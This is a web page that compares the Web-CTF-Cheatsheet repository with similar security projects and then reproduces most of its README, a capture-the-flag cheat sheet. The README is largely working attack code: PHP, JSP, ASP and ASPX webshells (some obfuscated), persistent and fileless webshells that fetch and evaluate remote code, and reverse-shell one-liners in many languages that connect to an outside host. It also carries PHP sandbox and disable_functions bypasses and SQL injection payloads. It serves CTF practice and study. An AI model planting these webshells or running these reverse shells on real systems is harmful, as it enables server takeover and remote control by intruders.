Top Related Projects
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
A list of interesting payloads, tips and tricks for bug bounty hunters.
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Awesome XSS stuff
Quick Overview
The w181496/Web-CTF-Cheatsheet repository is a comprehensive collection of cheatsheets and resources for web-based Capture the Flag (CTF) challenges. It covers a wide range of topics, including web application security, cryptography, and various hacking techniques, making it a valuable resource for security enthusiasts and professionals.
Pros
- Comprehensive Coverage: The repository covers a wide range of web-based CTF topics, providing a one-stop-shop for learning and reference.
- Actively Maintained: The project is actively maintained, with regular updates and contributions from the community.
- Beginner-Friendly: The cheatsheets are well-organized and easy to understand, making them accessible to both beginners and experienced security professionals.
- Community-Driven: The project encourages community participation, with contributors sharing their knowledge and experiences.
Cons
- Potential Outdated Information: As the field of web security is constantly evolving, some of the information in the cheatsheets may become outdated over time.
- Lack of Detailed Explanations: While the cheatsheets provide a good overview of various topics, they may not always provide in-depth explanations or step-by-step guides.
- Scattered Organization: The repository contains a large number of cheatsheets, which can make it challenging to navigate and find specific information.
- Limited Hands-on Exercises: The project primarily focuses on providing reference material, with limited hands-on exercises or practical examples.
Code Examples
N/A (This is not a code library)
Getting Started
N/A (This is not a code library)
Competitor Comparisons
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Pros of PayloadsAllTheThings
- More comprehensive coverage of various attack vectors and techniques
- Better organized with clear categorization and subcategories
- Regularly updated with contributions from a larger community
Cons of PayloadsAllTheThings
- Can be overwhelming for beginners due to its extensive content
- Less focused on CTF-specific scenarios and challenges
Code Comparison
PayloadsAllTheThings (SQL Injection):
' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
UNION ALL SELECT NULL,NULL,(SELECT CONCAT(table_name,0x0a) FROM information_schema.tables WHERE table_schema=DATABASE())--
Web-CTF-Cheatsheet (SQL Injection):
admin' --
admin' #
admin'/*
' UNION SELECT 1,2,3--
PayloadsAllTheThings provides more complex and varied examples, while Web-CTF-Cheatsheet offers simpler, CTF-oriented payloads.
Summary
PayloadsAllTheThings is a more extensive resource covering a wide range of web security topics, making it suitable for both CTF participants and security professionals. Web-CTF-Cheatsheet is more focused on common CTF challenges, providing concise and practical information for competition scenarios. Both repositories offer valuable insights, with PayloadsAllTheThings being more comprehensive and Web-CTF-Cheatsheet being more targeted towards CTF events.
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Pros of SecLists
- Comprehensive collection of multiple types of lists used in security assessments
- Regularly updated with contributions from the community
- Well-organized directory structure for easy navigation
Cons of SecLists
- Large repository size may be overwhelming for beginners
- Lacks specific guidance on how to use the lists effectively
- Not tailored specifically for web-based CTF challenges
Code Comparison
Web-CTF-Cheatsheet example (SQL injection):
' OR '1'='1
' OR 1=1--
' UNION SELECT NULL,NULL,NULL--
SecLists example (SQL injection):
' OR '1'='1
' OR 1=1#
' UNION SELECT username, password FROM users#
Both repositories provide similar SQL injection examples, but Web-CTF-Cheatsheet focuses more on CTF-specific payloads, while SecLists offers a broader range of injection techniques.
Web-CTF-Cheatsheet is more focused on web-based CTF challenges, providing concise and targeted information for competitors. SecLists, on the other hand, is a more extensive resource for various security testing scenarios, making it valuable for professional penetration testers and security researchers.
The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
Pros of CheatSheetSeries
- Comprehensive coverage of web security topics beyond CTF scenarios
- Regularly updated and maintained by a large community of security experts
- Provides detailed explanations and best practices for each security concept
Cons of CheatSheetSeries
- Less focused on specific CTF techniques and challenges
- May be overwhelming for beginners due to its extensive content
- Lacks concise, quick-reference format for CTF competitions
Code Comparison
CheatSheetSeries example (SQL Injection Prevention):
String query = "SELECT * FROM accounts WHERE custID=? AND password=?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, custID);
pstmt.setString(2, password);
ResultSet results = pstmt.executeQuery();
Web-CTF-Cheatsheet example (SQL Injection):
' OR '1'='1
' UNION SELECT 1,2,3--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
The CheatSheetSeries focuses on secure coding practices, while Web-CTF-Cheatsheet provides examples of exploit techniques commonly used in CTF challenges.
A list of interesting payloads, tips and tricks for bug bounty hunters.
Pros of bugbounty-cheatsheet
- More focused on real-world bug bounty scenarios and practical exploitation techniques
- Includes a wider range of vulnerability types and attack vectors
- Regularly updated with contributions from the bug bounty community
Cons of bugbounty-cheatsheet
- Less comprehensive coverage of specific CTF-style challenges
- Fewer detailed explanations and step-by-step guides for beginners
- Limited focus on web-specific vulnerabilities compared to Web-CTF-Cheatsheet
Code Comparison
Web-CTF-Cheatsheet:
import requests
r = requests.get('http://example.com')
print(r.text)
bugbounty-cheatsheet:
curl -X POST -H "Content-Type: application/json" -d '{"username":"admin","password":"password"}' http://example.com/api/login
The Web-CTF-Cheatsheet example demonstrates a simple Python script for making HTTP requests, while the bugbounty-cheatsheet example shows a more complex curl command for testing API endpoints, reflecting the different focus areas of each repository.
Both cheatsheets serve valuable purposes in their respective domains. Web-CTF-Cheatsheet is better suited for those preparing for CTF competitions and learning web security concepts, while bugbounty-cheatsheet is more appropriate for active bug hunters and security professionals working on real-world targets.
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Pros of Cheatsheet-God
- Broader scope covering various cybersecurity topics beyond web-specific CTF challenges
- More extensive collection of resources and tools for different security domains
- Includes practical examples and command usage for many tools
Cons of Cheatsheet-God
- Less focused on web-specific CTF challenges, which may be less helpful for dedicated web CTF participants
- Organization can be overwhelming due to the sheer volume of information
Code Comparison
Web-CTF-Cheatsheet:
# SQL Injection
' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
Cheatsheet-God:
# Nmap scanning
nmap -sC -sV -oA nmap/initial 10.10.10.10
nmap -p- -oA nmap/allports 10.10.10.10
The code snippets demonstrate the different focus areas of each repository. Web-CTF-Cheatsheet provides specific web exploitation techniques, while Cheatsheet-God offers a broader range of security tools and commands.
Both repositories serve as valuable resources for cybersecurity enthusiasts, with Web-CTF-Cheatsheet being more specialized for web-based CTF challenges and Cheatsheet-God offering a comprehensive collection of security-related cheatsheets and tools across various domains.
Awesome XSS stuff
Pros of AwesomeXSS
- Focused specifically on XSS, providing in-depth coverage of this particular attack vector
- Includes a comprehensive list of XSS payloads for various scenarios
- Offers practical examples and real-world applications of XSS techniques
Cons of AwesomeXSS
- Limited scope compared to Web-CTF-Cheatsheet, which covers a broader range of web security topics
- Less frequently updated, with the last commit being over a year ago
- Lacks the structured organization found in Web-CTF-Cheatsheet
Code Comparison
AwesomeXSS payload example:
<svg/onload=alert(1)>
Web-CTF-Cheatsheet SQL injection example:
' UNION SELECT NULL,NULL,NULL-- -
Both repositories provide valuable resources for web security enthusiasts and professionals. AwesomeXSS excels in its focused approach to XSS vulnerabilities, offering a wide array of payloads and techniques. On the other hand, Web-CTF-Cheatsheet provides a more comprehensive overview of various web security topics, making it a versatile resource for CTF participants and security researchers.
While AwesomeXSS offers more depth in XSS-specific content, Web-CTF-Cheatsheet covers a broader range of topics and is more frequently updated. The choice between the two depends on the user's specific needs and areas of interest in web security.
README
WEB CTF CheatSheet
Table of Contents
- Webshell
- Reverse Shell
- PHP Tag
- PHP Weak Type
- PHP Feature
- Command Injection
- SQL Injection
- LFI
- Upload
- Serialization
- SSTI / CSTI
- SSRF
- XXE
- Prototype Pollution
- Frontend
- Crypto
- Others
- Tools and Website
Webshell
PHP Webshell
<?php system($_GET["cmd"]); ?>
<?php system($_GET[1]); ?>
<?php system("`$_GET[1]`"); ?>
<?= system($_GET[cmd]);
<?=`$_GET[1]`;
<?php eval($_POST[cmd]);?>
<?php echo `$_GET[1]`;
<?php echo passthru($_GET['cmd']);
<?php echo shell_exec($_GET['cmd']);
<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
<script language="php">system("id"); </script>
<?php $_GET['a']($_GET['b']); ?>
// a=system&b=ls
// a=assert&b=system("ls")
<?php array_map("ass\x65rt",(array)$_REQUEST['cmd']);?>
// .php?cmd=system("ls")
<?@extract($_REQUEST);@die($f($c));?>
// .php?f=system&c=id
<?php @include($_FILES['u']['tmp_name']);
// build a <form action="http://x.x.x.x/shell.php" method="POST" enctype="multipart/form-data"> and upload a file;
// the uploaded temp file is then include()d
// From: http://www.zeroplace.cn/article.asp?id=906
<?php $x=~"\xBE\xAC\xAC\xBA\xAD\xAB";$x($_GET['a']); ?>
// not backdoor (assert): ~ flips every byte of the string, which yields ASSERT
// .php?a=system("ls")
echo "{${phpinfo()}}";
echo "${system(ls)}";
echo Y2F0IGZsYWc= | base64 -d | sh
// Y2F0IGZsYWc= => cat flag
echo -e "<?php passthru(\$_POST[1])?>;\r<?php echo 'A PHP Test ';" > shell.php
// cat shell.php
// <?php echo 'A PHP Test ';" ?>
echo ^<?php eval^($_POST['a']^); ?^> > a.php
// on Windows, echo this line (^ escapes the cmd.exe metacharacters)
<?php fwrite(fopen("gggg.php","w"),"<?php system(\$_GET['a']);");
<?php
header('HTTP/1.1 404');
ob_start();
phpinfo();
ob_end_clean();
?>
<?php
// no output is echoed
// e.g. ?pass=file_get_contents('http://kaibro.tw/test')
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
?>
<?=
// webshell without any alphanumeric characters: '[[[[@@' ^ '("(/%-' is "system", '@@[' ^ '#!/' is "cat"
$💩 = '[[[[@@' ^ '("(/%-';
$💩(('@@['^'#!/')." /????");
A=fl;B=ag;cat $A$B
Memory-resident webshell
Fix: restart
<?php
ignore_user_abort(true); // keep running after the client disconnects
set_time_limit(0); // no execution time limit
$file = 'shell.php';
$code = '<?php eval($_POST[a]);?>';
while(md5(file_get_contents($file)) !== md5($code)) {
if(!file_exists($file)) {
file_put_contents($file, $code);
}
usleep(50);
}
?>
Fileless webshell
Fix: restart
<?php
unlink(__FILE__);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xxx/xxx.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>
JSP Webshell
- No output:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
- With output:
<%
if("kaibro".equals(request.getParameter("pwd"))) {
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
- Unicode webshell:
<%\u0052\u0075\u006E\u0074\u0069\u006D\u0065\u002E\u0067\u0065\u0074\u0052\u0075\u006E\u0074\u0069\u006D\u0065\u0028\u0029\u002E\u0065\u0078\u0065\u0063\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002E\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006D\u0065\u0074\u0065\u0072\u0028\u0022\u0069\u0022\u0029\u0029\u003B%>
(same effect as <%Runtime.getRuntime().exec(request.getParameter("i"));%>)
- JSPX webshell:
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
version="1.2">
<jsp:directive.page contentType="text/html"/>
<jsp:declaration>
</jsp:declaration>
<jsp:scriptlet>
Runtime.getRuntime().exec(request.getParameter("i"));
</jsp:scriptlet>
<jsp:text>
</jsp:text>
</jsp:root>
- CP037 webshell:
Lo%C2%A7%C2%94%C2%93@%C2%A5%C2%85%C2%99%C2%A2%C2%89%C2%96%C2%95~%7F%C3%B1K%C3%B0%7F@%C2%85%C2%95%C2%83%C2%96%C2%84%C2%89%C2%95%C2%87~%7F%C2%83%C2%97%C3%B0%C3%B3%C3%B7%7Fon%25L%C2%91%C2%A2%C2%97z%C2%99%C2%96%C2%96%C2%A3@%C2%A7%C2%94%C2%93%C2%95%C2%A2z%C2%91%C2%A2%C2%97~%7F%C2%88%C2%A3%C2%A3%C2%97zaa%C2%91%C2%81%C2%A5%C2%81K%C2%A2%C2%A4%C2%95K%C2%83%C2%96%C2%94a%C3%91%C3%A2%C3%97a%C3%97%C2%81%C2%87%C2%85%7F%25@@%C2%A5%C2%85%C2%99%C2%A2%C2%89%C2%96%C2%95~%7F%C3%B1K%C3%B2%7Fn%25L%C2%91%C2%A2%C2%97z%C2%84%C2%89%C2%99%C2%85%C2%83%C2%A3%C2%89%C2%A5%C2%85K%C2%97%C2%81%C2%87%C2%85@%C2%83%C2%96%C2%95%C2%A3%C2%85%C2%95%C2%A3%C3%A3%C2%A8%C2%97%C2%85~%7F%C2%A3%C2%85%C2%A7%C2%A3a%C2%88%C2%A3%C2%94%C2%93%7Fan%25L%C2%91%C2%A2%C2%97z%C2%84%C2%85%C2%83%C2%93%C2%81%C2%99%C2%81%C2%A3%C2%89%C2%96%C2%95n%25La%C2%91%C2%A2%C2%97z%C2%84%C2%85%C2%83%C2%93%C2%81%C2%99%C2%81%C2%A3%C2%89%C2%96%C2%95n%25L%C2%91%C2%A2%C2%97z%C2%A2%C2%83%C2%99%C2%89%C2%97%C2%A3%C2%93%C2%85%C2%A3n%25%C3%99%C2%A4%C2%95%C2%A3%C2%89%C2%94%C2%85K%C2%87%C2%85%C2%A3%C3%99%C2%A4%C2%95%C2%A3%C2%89%C2%94%C2%85M%5DK%C2%85%C2%A7%C2%85%C2%83M%C2%99%C2%85%C2%98%C2%A4%C2%85%C2%A2%C2%A3K%C2%87%C2%85%C2%A3%C3%97%C2%81%C2%99%C2%81%C2%94%C2%85%C2%A3%C2%85%C2%99M%7F%C2%89%7F%5D%5D%5E%25La%C2%91%C2%A2%C2%97z%C2%A2%C2%83%C2%99%C2%89%C2%97%C2%A3%C2%93%C2%85%C2%A3n%25L%C2%91%C2%A2%C2%97z%C2%A3%C2%85%C2%A7%C2%A3n%25La%C2%91%C2%A2%C2%97z%C2%A3%C2%85%C2%A7%C2%A3n%25La%C2%91%C2%A2%C2%97z%C2%99%C2%96%C2%96%C2%A3n%25
(same effect as the JSPX webshell above: Runtime.getRuntime().exec(request.getParameter("i"));)
- EL webshell:
${Runtime.getRuntime().exec("touch /tmp/pwned")}
ASP Webshell
<%eval request("kaibro")%>
<%execute request("kaibro")%>
<%ExecuteGlobal request("kaibro")%>
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
ASPX Webshell
- General:
<%@ Page Language="Jscript"%><%eval(Request.Item["kaibro"],"unsafe");%>
- Upload:
<%if (Request.Files.Count!=0){Request.Files[0].SaveAs(Server.MapPath(Request["f"]));}%>
Reverse Shell
- Listen on a local port
ncat -vl 5566
- Perl
perl -e 'use Socket;$i="kaibro.tw";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- Bash
bash -i >& /dev/tcp/kaibro.tw/5566 0>&1
bash -c 'bash -i >& /dev/tcp/kaibro.tw/5566 0>&1'
0<&196;exec 196<>/dev/tcp/kaibro.tw/5566; sh <&196 >&196 2>&196
- PHP
php -r '$sock=fsockopen("kaibro.tw",5566);exec("/bin/sh -i <&3 >&3 2>&3");'
- NC
nc -e /bin/sh kaibro.tw 5566
- Telnet
mknod backpipe p && telnet kaibro.tw 5566 0<backpipe | /bin/bash 1>backpipe
- Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("kaibro.tw",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("kaibro.tw","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
- Node.js
var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "kaibro.tw", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);});
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/kaibro.tw/5566 0>&1'");
- Java
Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/kaibro.tw/5278;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();
java.lang.Runtime.exec() payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html
- Powershell
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c kaibro.tw -p 5566 -e cmd
PHP Tag
<? ?>
- short_open_tag decides whether short tags can be used
- or compile PHP with --enable-short-tags
<?=
- equivalent to <? echo
- since PHP 5.4.0: always works!
<% %> and <%=
- removed since PHP 7.0.0
- requires asp_tags = On
<script language="php">
- removed since PHP 7.0.0
<script language="php">system("id"); </script>
PHP Weak Type
- var_dump('0xABCdef' == ' 0xABCdef');
  - true (Output for hhvm-3.18.5 - 3.22.0, 7.0.0 - 7.2.0rc4: false)
- var_dump('0010e2' == '1e3');
  - true
- strcmp([],[])
  - 0
- sha1([])
  - NULL
- '123' == 123
- 'abc' == 0
- '123a' == 123
- '0x01' == 1
  - since PHP 7.0, hexadecimal strings are no longer treated as numbers
  - e.g. var_dump('0x01' == 1) => false
- '' == 0 == false == NULL
- md5([1,2,3]) == md5([4,5,6]) == NULL
  - usable for login bypass (the user does not exist and password is NULL)
- var_dump(md5(240610708));
  - 0e462097431906509019562988736854
- var_dump(sha1(10932435112));
  - 0e07766915004133176347055865026311692244
- $a="123"; $b="456"
  $a + $b == "579";
  $a . $b == "123456"
- $a = 0; $b = 'x';
  $a == false => true
  $a == $b => true
  $b == true => true
- $a = 'a'
  ++$a => 'b'
  $a+1 => 1
Other PHP Features
Overflow
- 32-bit
intval('1000000000000')
=> 2147483647
- 64-bit
intval('100000000000000000000')
=> 9223372036854775807
Floating-point precision
- php -r "var_dump(1.000000000000001 == 1);"
  - false
- php -r "var_dump(1.0000000000000001 == 1);"
  - true
- $a = 0.1 * 0.1; var_dump($a == 0.01);
  - false
ereg is truncated by NULL
var_dump(ereg("^[a-zA-Z0-9]+$", "1234\x00-!@#%"));
1
ereg and eregi were removed in PHP 7.0.0
intval
- not rounded; the fractional part is discarded
var_dump(intval('5278.8787'));
5278
intval(012) => 10
intval("012") => 12
extract variable overwrite
extract($_GET);
.php?_SESSION[name]=admin
echo $_SESSION['name']
=> 'admin'
trim
- strips whitespace (or other characters) from both ends of a string
- with no second argument, the following characters are stripped by default: " " (0x20), "\t" (0x09), "\n" (0x0A), "\x0B" (0x0B), "\r" (0x0D), "\0" (0x00)
- note that the default set does not include "\f" (0x0C)
- compare: is_numeric() accepts a leading \f
- if the argument is an unset or empty variable, the return value is the empty string
is_numeric
- is_numeric(" \t\r\n 123") => true
- is_numeric(' 87') => true
- is_numeric('87 ') => false
- is_numeric(' 87 ') => false
- is_numeric('0xdeadbeef')
  - PHP >= 7.0.0 => false
  - PHP < 7.0.0 => true
    - can be used to bypass injection filters
- the following strings are also valid (return true):
' -.0'
'0.'
' +2.1e5'
' -1.5E+25'
'1.e5'
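The comparison rules behind the magic-hash entries in PHP Weak Type and the is_numeric table above, as an added example that is not from the README: a simplified Python model (an assumption, not PHP's own parser) of PHP 7's loose string comparison and of is_numeric(), next to the strict, constant-time comparison a login check should use instead. QNKCDZO is a well-known magic-hash input not listed on the page; STORED_HASH is a constructed scenario.

```python
import hashlib
import hmac
import re

# Leading whitespace PHP accepts in a numeric string: space, \t, \n, \r, \v, \f.
# Trailing whitespace is rejected (PHP < 8), matching the is_numeric table above.
# Hex ("0x...") is not numeric on PHP >= 7. Simplified model, not PHP's parser.
_NUMERIC_RE = re.compile(
    r"^[ \t\n\r\x0b\x0c]*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?$"
)


def php_is_numeric(s: str) -> bool:
    """Model of PHP 7 is_numeric()."""
    return bool(_NUMERIC_RE.match(s))


def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP 7 '==' on two strings: if both look numeric they are
    compared as numbers, so '0e462...' == '0e830...' because both are 0.0."""
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) == float(b)
    return a == b


def strict_eq(a: str, b: str) -> bool:
    """What a login check should do: byte-wise, constant-time comparison
    (in PHP: hash_equals(), or at least ===)."""
    return hmac.compare_digest(a.encode(), b.encode())


def md5_hex(value: str) -> str:
    return hashlib.md5(value.encode()).hexdigest()


def sha1_hex(value: str) -> str:
    return hashlib.sha1(value.encode()).hexdigest()


# Constructed scenario: the stored password hash happens to be a magic hash
# (md5("240610708") from the page) and the attacker does not know the password.
STORED_HASH = md5_hex("240610708")


def vulnerable_login(supplied_password: str) -> bool:
    """Loose comparison: any password whose md5 is '0e' + digits also passes."""
    return php_loose_eq(STORED_HASH, md5_hex(supplied_password))


def fixed_login(supplied_password: str) -> bool:
    """Strict comparison: only the real password passes."""
    return strict_eq(STORED_HASH, md5_hex(supplied_password))


if __name__ == "__main__":
    for guess in ("240610708", "QNKCDZO", "wrong"):
        print(f"{guess}: loose={vulnerable_login(guess)} strict={fixed_login(guess)}")
    for s in (" \t\r\n 123", " 87", "87 ", "0xdeadbeef", "\f123", " -.0", "1.e5"):
        print(f"is_numeric({s!r}) -> {php_is_numeric(s)}")
```

The model deliberately leaves out integer-overflow and PHP 8 semantics; its purpose is to make the "0e" class of collisions reproducible and to show that the fix is not a better hash but a comparison that never coerces types.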
in_array
in_array('5 or 1=1', array(1, 2, 3, 4, 5))
- true
in_array('kaibro', array(0, 1, 2))
- true
in_array(array(), array('kai'=>false))
- true
in_array(array(), array('kai'=>null))
- true
in_array(array(), array('kai'=>0))
- false
in_array(array(), array('kai'=>'bro'))
- false
in_array('kai', array('kai'=>true))
- true
in_array('kai', array('kai'=>'bro'))
- false
in_array('kai', array('kai'=>0))
- true
in_array('kai', array('kai'=>1))
- false
array_search
mixed array_search(mixed $needle , array $haystack [, bool $strict = false ])
- searches the haystack array for the value of needle; returns the index on success and false on failure
- when $strict is false, loose comparison is used; the default is false
- Example
$arr=array(1,2,0); var_dump(array_search('kai', $arr))
int(2)
$arr=array(1,2,0); var_dump(array_search('1', $arr))
int(0)
parse_str
- parse_str(string, array)
- parses the query string into variables
- if the second argument is not given, it is parsed into variables of the same name
- on PHP 7.2, omitting the second argument raises an E_DEPRECATED warning
- parse_str('gg[kaibro]=5566');
array(1) { ["kaibro"]=> string(4) "5566" }
- spaces and . in PHP variable names are converted to underscores
parse_str("na.me=kaibro&pass wd=ggininder",$test); var_dump($test);
array(2) { ["na_me"]=> string(6) "kaibro" ["pass_wd"]=> string(9) "ggininder" }
parse_url
- has pitfalls when handling an incoming URL
- parse_url('/a.php?id=1')
array(2) { ["host"]=> string(5) "a.php" ["query"]=> string(4) "id=1" }
- parse_url('//a/b')
  - host: a
- parse_url('..//a/b/c:80')
  - host: ..
  - port: 80
  - path: //a/b/c:80
- parse_url('///a.php?id=1')
  - false
- parse_url('/a.php?id=1:80')
  - PHP < 7.0.0: false
  - PHP >= 7.0.0: array(2) { ["path"]=> string(6) "/a.php" ["query"]=> string(7) "id=1:80" }
- parse_url('http://kaibro.tw:87878')
  - on versions below 5.3.X: array(3) { ["scheme"]=> string(4) "http" ["host"]=> string(9) "kaibro.tw" ["port"]=> int(22342) }
  - otherwise: false
preg_replace
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
- searches $subject for matches of $pattern and replaces them with $replacement
- with the /e modifier on the first argument, $replacement is executed as PHP code
  - it only executes when there is a match
- since PHP 5.5.0 this raises E_DEPRECATED; PHP 7.0.0 no longer supports it, use preg_replace_callback() instead
example:
<?php
$a='phpkaibro';
echo preg_replace('/(.*)kaibro/e','\\1info()',$a);
sprintf / vprintf
- no type check on the format string
- in the format string, the character following % (other than % itself) is parsed as a conversion type
- e.g. %\ , %' , %1$\'
- under some SQLi filters, the single quote in %' and 1=1# is escaped to \' ; %\ is then consumed as a conversion, and the ' escapes successfully
- why: sprintf is implemented with switch...case...
  - an unknown type falls into default, which does nothing
file_put_contents
- if the second argument is an array, PHP concatenates it into a string
- example:
<?php $test = $_GET['txt']; if(preg_match('[<>?]', $test)) die('bye'); file_put_contents('output', $test);
- ?txt[]=<?php phpinfo(); ?> writes straight through
spl_autoload_register
spl_autoload_register() can autoload classes
- with no argument, it autoloads .inc and .php
- Example:
  - if the directory contains kaibro.inc whose content is class Kaibro{...}
  - then spl_autoload_register() loads that class
Path normalization
a.php/.
file_put_contents("a.php/.", "<?php phpinfo() ?>");
- writes successfully
- tested: works on Windows (overwrites), not on Linux
- can bypass some regex checks
file_get_contents("a.php/.");
- tested: reads successfully on Windows, not on Linux
- many other functions are affected too
" => .  (a"php)
> => ?  (a.p>p, a.>>>)
< => *  (a.<)
URL query decode
$_GET URL-decodes the incoming parameters before returning them; $_SERVER['REQUEST_URI'] and $_SERVER['QUERY_STRING'] return them as-is
Example:
Request: http://kaibro.tw/test.php?url=%67%67
- $_GET: [url] => gg
- $_SERVER['REQUEST_URI']: /test.php?url=%67%67
- $_SERVER['QUERY_STRING']: url=%67%67
OPcache
- improves performance by compiling PHP scripts to bytecode and caching it
- the settings live in php.ini
  - opcache.enable: whether it is enabled
  - opcache.file_cache: the cache directory
    - e.g. opcache.file_cache="/tmp/opcache": the cached copy of /var/www/index.php is stored at /tmp/opcache/[system_id]/var/www/index.php.bin
  - opcache.file_cache_only: priority of the file cache
  - opcache.validate_timestamps: whether timestamp validation is enabled
- system_id is computed from the Zend and PHP versions to ensure compatibility
- so under some conditions a webshell can be written by uploading over the cached file
  - system_id must match the target machine
  - the timestamp must agree
- https://github.com/GoSecure/php7-opcache-override
  - the disassembler turns bytecode into pseudocode
- Example
PCRE backtrack limit bypass
- PHP's PCRE library uses an NFA as its regex engine
- when a match fails, an NFA backtracks and tries other states
- to prevent DoS, PHP caps the number of PCRE backtracks: pcre.backtrack_limit
  - default is 1000000
- when the backtrack count exceeds the limit, preg_match() returns false
  - a blocklist check of the form if (preg_match($bad, $input)) die() treats that false like "no match" and lets the input through; test for === false and reject on error instead
- Example
  - Code-Breaking Puzzles - pcrewaf
  - N1CTF 2019 - sql_manage
open_basedir bypass
- glob directory listing
$file_list = array();
$it = new DirectoryIterator("glob:///*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f){
echo "{$f}<br/>";
}
chdir('img');
ini_set('open_basedir','..');
chdir('..');chdir('..');
chdir('..');chdir('..');
ini_set('open_basedir','/');
echo(file_get_contents('flag'));
- symlinks
mkdir('/var/www/html/a/b/c/d/e/f/g/',0777,TRUE);
symlink('/var/www/html/a/b/c/d/e/f/g','foo');
ini_set('open_basedir','/var/www/html:bar/');
symlink('foo/../../../../../../','bar');
unlink('foo');
symlink('/var/www/html/','foo');
echo file_get_contents('bar/etc/passwd');
- Fastcgi
- ...
disable_functions bypass
- bash shellshock
- mail()
  - sendmail
  - putenv to set LD_PRELOAD
  - trick: LD_PRELOAD without sendmail/getuid()
- mb_send_mail()
  - basically the same as mail()
- imap_mail()
  - same as above
- imap_open()
<?php $payload = "echo hello|tee /tmp/executed"; $encoded_payload = base64_encode($payload); $server = "any -o ProxyCommand=echo\t".$encoded_payload."|base64\t-d|bash"; @imap_open('{'.$server.'}:143/imap}INBOX', '', '');
- error_log()
  - when the second argument message_type is 1, sendmail is invoked
- ImageMagick
  - LD_PRELOAD + ghostscript:
    - ImageMagick calls ghostscript to parse eps
    - Link
  - LD_PRELOAD + ffmpeg
  - MAGICK_CODER_MODULE_PATH
  - MAGICK_CONFIGURE_PATH
    - delegates.xml defines the rules for handling each file type
    - putenv can point it at a crafted config file path
    - Link
<delegatemap>
<delegate decode="ps:alpha" command="sh -c &quot;/readflag > /tmp/output&quot;"/>
</delegatemap>
  - overriding PATH + ghostscript:
    - prepare an executable named gs in advance
#include <stdlib.h>
#include <string.h>
int main() { unsetenv("PATH"); const char* cmd = getenv("CMD"); system(cmd); return 0; }
putenv('PATH=/tmp/mydir'); putenv('CMD=/readflag > /tmp/mydir/output'); chmod('/tmp/mydir/gs','0777'); $img = new Imagick('/tmp/mydir/1.ept');
- dl()
  - loads a module
dl("rce.so")
  - This function was removed from most SAPIs in PHP 5.3.0, and was removed from PHP-FPM in PHP 7.0.0.
- FFI
  - PHP 7.4 feature
  - preloading + ffi
  - e.g. RCTF 2019 - nextphp
<?php $ffi = FFI::cdef("int system (const char* command);"); $ffi->system("id");
- Windows COM
  - requirements
com.allow_dcom = true
extension=php_com_dotnet.dll
  - PoC:
<?php
$command = $_GET['cmd'];
$wsh = new COM('WScript.shell'); // Shell.Application also works
$exec = $wsh->exec("cmd /c".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
- iconv
  - https://gist.github.com/LoadLow/90b60bd5535d6c3927bb24d5f9955b80
  - requirements
    - can upload .so and gconv-modules
    - can set environment variables
    - iconv(), iconv_strlen(), or php://filter's convert.iconv
-
  - 7.1 - all versions to date
  - 7.2 < 7.2.19 (released: 30 May 2019)
  - 7.3 < 7.3.6 (released: 30 May 2019)
-
  - 7.0 - all versions to date
  - 7.1 - all versions to date
  - 7.2 - all versions to date
  - 7.3 - all versions to date
-
  - 7.0 - all versions to date
  - 7.1 - all versions to date
  - 7.2 - all versions to date
  - 7.3 - all versions to date
  - 7.4 - all versions to date
- PHP SplDoublyLinkedList UAF Sandbox Escape
